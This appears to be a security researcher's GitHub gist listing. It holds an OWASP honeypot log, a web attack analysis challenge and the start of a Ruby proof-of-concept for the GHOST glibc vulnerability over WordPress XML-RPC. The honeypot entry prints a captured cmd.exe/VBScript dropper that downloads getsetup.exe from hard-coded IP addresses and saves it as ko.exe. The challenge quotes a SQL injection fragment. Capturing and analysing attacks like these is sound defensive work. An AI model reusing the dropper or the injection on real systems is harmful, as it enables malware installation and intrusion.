@rcbarnett-zz
rcbarnett-zz / gist:ffe3830e6aa41a03f52c
Created April 13, 2015 15:58
OWASP Honeypot Example #1
--VSvmJH8AAQEAAFev-sYAAABf-A--
[13/Apr/2015:15:52:07 +0000] VSvmJH8AAQEAAFev-sYAAABf 62.210.93.179 33589 192.168.0.222 3128
--VSvmJH8AAQEAAFev-sYAAABf-B--
POST http://REDACTED/hostdata21.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: REDACTED
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 1361
Content-Type: application/x-www-form-urlencoded
{.exec | cmd.exe / c echo > 22222.vbs dim wait, quit, out: Set xml = CreateObject("Microsoft.XMLHTTP"): Set WshShell = Wscript.CreateObject("WScript.Shell"): DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"): for each Url in DS: wait = true: quit = false: D(Url): if quit then: exit
for: end
if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
if :xml.Open "GET",
"http://" ^ & Url ^ & "/getsetup.exe",
True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat(): If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3: sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe",
2: End su
@rcbarnett-zz
rcbarnett-zz / Analysis Challenge #1
Created February 9, 2015 15:53
Web Attack Analysis Challenge #1
Review this HTTP request -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(
@rcbarnett-zz
rcbarnett-zz / ghost_xmlrpc.rb
Last active April 2, 2016 08:55
GHOST gethostbyname() Vuln (CVE-2015-0235) - WordPress XML-RPC Pingback Vector
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
require "net/http"
require "uri"

# Expect exactly two arguments: the target URL and the request count.
if ARGV.count != 2
  # $0 is the script name; ARGV[0] would be the first argument, not the program.
  puts "Usage: #{$0} [Target URL] [count]"
  exit
end